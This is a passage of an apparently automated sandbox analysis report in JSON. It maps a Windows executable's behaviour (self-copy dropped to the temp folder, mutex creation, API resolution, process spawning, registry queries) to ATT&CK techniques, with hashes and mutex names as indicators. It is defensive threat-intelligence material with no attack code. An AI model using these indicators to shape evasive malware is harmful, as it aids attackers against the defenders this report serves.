"informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004852)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004944)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da594276@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"130014008e5a4276@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e0b69@ADVAPI32.dll\"\n \"0e000f00703f0b69@ADVAPI32.dll\"\n \"0e000f00cc3f0b69@ADVAPI32.dll\"\n \"11001200b4470b69@ADVAPI32.dll\"\n \"1100120048480b69@ADVAPI32.dll\"\n \"120013008c480b69@ADVAPI32.dll\"\n \"12001300e4480b69@ADVAPI32.dll\"\n \"14001500386e0b69@ADVAPI32.dll\"\n \"14001500506e0b69@ADVAPI32.dll\"\n \"14001500686e0b69@ADVAPI32.dll\"\n \"17001800806e0b69@ADVAPI32.dll\"\n \"0d000e00986e0b69@ADVAPI32.dll\"\n \"11001200a86e0b69@ADVAPI32.dll\"\n \"11001200bc6e0b69@ADVAPI32.dll\"\n \"0d000e0044660b69@WININET.dll\"\n \"0d000e00b4660b69@WININET.dll\"\n \"10001100ec660b69@WININET.dll\"\n \"1000110090670b69@WININET.dll\"\n \"10001100006f0b69@WININET.dll\"\n \"10001100146f0b69@WININET.dll\"\n \"14001500286f0b69@WININET.dll\"\n \"14001500406f0b69@WININET.dll\"\n \"12001300586f0b69@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"CreateProcessW\" with parameter \":*C:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe *\" - (UID: 00000000-00004852)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZVQTRG\" - (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a30000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75a30000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75810000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 764f0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76b50000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75b90000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6ffd0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75ea0000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77a10000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764F0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".data\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".bss\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".idata\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".CRT\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".tls\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea ...\" (UID: 00000000-00004968)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVQTRG\" (UID: 00000000-00004944)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea ...\" (UID: 00000000-00004968)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVQTRG\" (UID: 00000000-00004944)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" was detected as \"MinGW\" and name: \"Compiler\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VERSION.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" reads file \"c:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\version.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: 